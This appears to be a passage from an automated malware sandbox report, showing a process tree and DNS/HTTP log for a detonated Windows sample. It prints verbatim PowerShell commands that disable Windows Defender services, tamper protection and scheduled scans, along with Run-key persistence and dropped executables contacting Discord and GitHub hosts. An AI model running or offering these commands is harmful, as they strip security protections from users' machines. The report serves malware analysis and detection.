                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3284
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4308
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                    PID:576
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                    PID:4168
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4024
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:2492
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4844
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4976
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3140
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4924
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4596
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4888
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1400
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4748
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2216
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2680
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5884
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:820
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\りメノひ丂ん乃刀フ√ズひゐキんレ.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                                                                                                                                                                                          chcp 65001
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3904
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                          ping -\Common 10 localhost
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1564
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4984
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3396
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3168
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5912
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5268
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5296

                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.129.233
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.130.233
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.133.233
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.135.233
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.134.233
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          bg.microsoft.map.fastly.net
                                                                                                                                                                                                                                                                                                                                                                                                          bg.microsoft.map.fastly.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          199.232.210.172
                                                                                                                                                                                                                                                                                                                                                                                                          bg.microsoft.map.fastly.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          199.232.214.172
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          pki-goog.l.google.com
                                                                                                                                                                                                                                                                                                                                                                                                          pki-goog.l.google.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          142.250.187.227
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          133.110.199.185.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          133.110.199.185.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          133.110.199.185.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          cdn-185-199-110-133githubcom
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                          iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          20.31.169.57
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json/
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          GET /json/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                                                                                                                                                                                                                                                                                                                                                                          Host: ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 31 Mar 2025 16:44:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 288
                                                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                          X-Ttl: 59
                                                                                                                                                                                                                                                                                                                                                                                                          X-Rl: 42
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.110.133
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.111.133
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.109.133
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.108.133
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          1.112.95.208.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          1.112.95.208.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          1.112.95.208.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          ip-apicom
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          login.live.com
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          login.live.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          login.live.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          login.msa.msidentity.com
                                                                                                                                                                                                                                                                                                                                                                                                          login.msa.msidentity.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          prdv4a.aadg.msidentity.com
                                                                                                                                                                                                                                                                                                                                                                                                          prdv4a.aadg.msidentity.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.130
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.131
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.71
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.0
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.2
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.3
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.0
                                                                                                                                                                                                                                                                                                                                                                                                          www.tm.v4.a.prd.aadg.akadns.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.73
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.digicert.com
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.digicert.com
